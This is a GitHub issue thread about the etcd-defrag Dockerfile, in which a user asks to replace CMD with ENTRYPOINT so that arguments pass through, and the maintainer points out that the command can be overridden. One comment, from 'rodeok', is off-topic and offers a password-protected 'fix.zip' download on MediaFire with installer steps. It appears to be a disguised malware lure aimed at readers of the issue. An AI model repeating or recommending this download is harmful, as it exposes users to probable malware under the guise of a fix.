### ISSUE TITLE
Self-built docker container doesn't allow for arguments

### ISSUE THREAD

**Issue by pchaseh** [ahrtr/etcd-defrag#54]
When I build the docker container by myself via `CGO_ENABLED=0 go build` and then `DOCKER_BUILDKIT=1 docker build -t "etcd-defrag:${VERSION}" -f Dockerfile .`, I'm unable to run it with arguments to the program:
```
# /usr/bin/docker run --rm etcd-defrag:v0.15.0 --help
docker: Error response from daemon: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: exec: "--help": executable file not found in $PATH: unknown.
#  /usr/bin/docker run --rm etcd-defrag:v0.15.0
Validating configuration.
No defragmentation rule provided
Performing health check.
```

If I change the Dockerfile from `CMD ["/usr/local/bin/etcd-defrag"]` to `ENTRYPOINT ["/usr/local/bin/etcd-defrag"]`, it works as expected:
```
# /usr/bin/docker run --rm etcd-defrag:v0.15.0 --help
A simple command line tool for etcd defragmentation

Usage:
  etcd-defrag [flags]
. . .
```

Looking at the official docker images released that were built with Ko, we can see that it's doing the same thing
```
            "Cmd": null,
            "Image": "",
            "Volumes": null,
            "WorkingDir": "",
            "Entrypoint": [
                "/ko-app/etcd-defrag"
            ]
```

In my opinion the repository's Dockerfile should work out of the box without relying on a third party tool to construct containers, so I propose that this be changed to `ENTRYPOINT` (assuming that Ko either doesn't actually rely on this Dockerfile, or that if it does it will still be capable of generating functioning builds)

**Comment by rodeok** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahrtr** [comment]
Not a big problem to me. You can override the default command specified by CMD.
Please read https://www.docker.com/blog/docker-best-practices-choosing-between-run-cmd-and-entrypoint/



You can execute `docker run --rm etcd-defrag:<your-tag> etcd-defrag -h`
